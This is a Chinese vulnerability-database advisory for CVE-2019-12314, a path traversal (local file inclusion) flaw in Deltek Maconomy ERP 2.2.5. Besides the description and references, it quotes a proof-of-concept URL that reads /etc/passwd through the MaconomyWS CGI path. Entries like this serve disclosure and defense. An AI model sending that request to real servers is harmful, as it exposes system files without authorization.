Deltek Maconomy 路径遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1621276 漏洞类型 路径遍历
发布时间 2019-05-29 更新时间 2019-11-06
CVE编号 CVE-2019-12314 CNNVD-ID CNNVD-201905-985
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050303
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201905-985
|漏洞详情
Deltek Maconomy是美国Deltek公司的一套企业资源计划(ERP)软件。 Deltek Maconomy 2.2.5版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
|漏洞EXP
# Exploit Title: Maconomy Erp local file include
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:

POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
|参考资料

来源:github.com

链接:https://github.com/JameelNabbo/exploits/blob/master/Maconomy%20Erp%20local%20file%20include.txt


来源:MISC

链接:http://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-12314


来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html